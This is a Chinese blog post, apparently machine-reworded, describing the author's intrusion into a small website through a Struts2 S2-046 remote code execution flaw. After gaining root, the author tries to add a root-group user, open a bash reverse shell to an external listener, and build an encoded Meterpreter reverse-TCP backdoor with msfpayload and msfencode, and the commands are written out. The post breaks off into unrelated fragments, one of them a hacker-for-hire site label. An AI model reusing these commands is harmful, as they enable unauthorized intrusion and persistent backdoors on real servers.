一、布景
偶尔碰到一个小站存在st2-046代码长途履行缝隙,心里乐滋滋。
履行whoami检查自己是什么权限
现已是root了,就测验上传一个webshell
可是却提示上传失利,页面不存在
上传txt显现成功
通过测验,服务器装有一些防火墙之类的东西或者是安全策略,只需上传的文件里包括可履行代码就上传失利
可是转念一想我为什么非要传webshell,传上去之后不仍是要提权,弄到他的ssh权限。
所以镇定考虑了一下现在的局势:
1 root权限
2 能够履行非交互性指令
3 不能上传文件
脑海里一道闪电,蹦出来三个思路
1 直接长途履行指令 增加一个用户 然后参加root组
2 nc反弹shell 进行交互性指令 设置用密钥登陆
3 用神器msf生成一个linux后门,进一步拿下ssh
二、一波操作猛如虎
思路一
首要useradd test增加一个名为test的用户
由于不能交互 所以无法运用passwd 指令
测验echo “PASSWORD” | passwd –stdin USERNAME指令
指令履行完结
然后参加root组
usermod -g root test
用id+用户名检查是否增加成功
奈斯
然后便是高高兴兴去衔接ssh
成果他一向回绝我的暗码。。。
这是什么操作。。。
得到了你的人得不到你的心吗。。。
其时也不明白为什么会这样
后来百度查了一下
才知道这个指令有时候是有问题的
思路一失利
思路二
已然问题出在加暗码的指令上面,我就只需把shell反弹出来然后再运用passwd指令即可
测验了一下方针站不支持其他脚本,也没有nc,就直接用bash转发吧
先打开一台外网windows服务器,敞开nc监听
指令为nc.exe –vv –l –p 端口
Linux上bash转发指令如下
bash -i >& /dev/tcp/x.x.x.x/2333 0>&1
提示履行成功
可是windows服务器上并没有收到任何反弹信息
换端口换反弹 *** 都失利
用脚趾头想想应该是防火墙的问题
思路二失利。
思路三
前两次均失利,心里很难受了
不过不要紧,咱们还有神器msf
假定本机ip为192.168.250.162监听端口为8090
用msf生成一个linux的后门指令如下:
(1)关于metasploit 4.2版别,运用msfpayload生成后门程序,运用msfencode对后门进行二次编码防杀。
生成后门并运用msfencode shikata_ga_nai编码程序对后门程序再编码。
指令:
msfpayloadlinux/x86/meterpreter/reverse_tcp LHOST=192.168.250.162 LPORT=8090 R |msfencode -t elf -e x86/shikata_ga_nai -c 3 -o /root/test
详解:
运用模块 linux/x86/meterpreter/reverse_tcp 能够实现在32位linux体系上反弹TCP会话
LHOST=192.168.250.162 反弹衔接到metasploit进犯主机的IP地址
LPORT=8090 反弹衔接到metasploit进犯主机的TCP端口号
-t elf 编码生成的文件类型
-e x86/shikata_ga_nai 运用的编码 ***
-c 3 重复封装编码3次
-o /root/test 输出后门文件到/root目录下,文件名test
(2)在较新版别的metasploit中,msfpayload和msfencode现已被撤销,功用合并为msfvenom
运用msfvenom创立后门到达相同作用的指令为:
[1] [2] 黑客接单网
@cfreal的文章中已经说了,我这里在多说句,相关代码可以看看1和2还有SAFE_ACCPET的宏定义: 5、 安天智甲终端防御系统与安天资产安全运维系统组合使用,可以充分减少暴露面,形成威胁防御响...
已有公开渠道的Metasploit CVE-2019-0708漏洞利用模块发布,构成现实的蠕虫威胁。 关于CVE-2019-0708漏洞,有一个比较关键但非常重要的细节,该漏洞与远程桌面服务(Remo...
前语 本文是 Java Web 工程源代码安全审计实战的第 2 部分,首要解说 WebGoat 工程的 SQL 注入源码审计思路和攻防演练。包含一般的 SQL 字符注入和 SQL 盲注两个事例,并扩展...
拿手机举个比如,硬件所指自然是手机自身,而软件又可以称为固件。 (2)注释符号 $stmt->bind_result($name, $district);咱们也测验了国内干流一切的安全及防护软件...
今年6月,美国的一次网络攻击破坏了伊斯兰革命卫队使用的一个关键数据库。 根据美国高级官员的说法,6月份针对伊朗的秘密网络攻击摧毁了伊朗准军事部门使用的一个关键数据库,该数据库和伊朗策划...
/// 处理资源的恳求 /// </summary>Step 2 24cpe:/a:cisco:adaptive_security_appliance...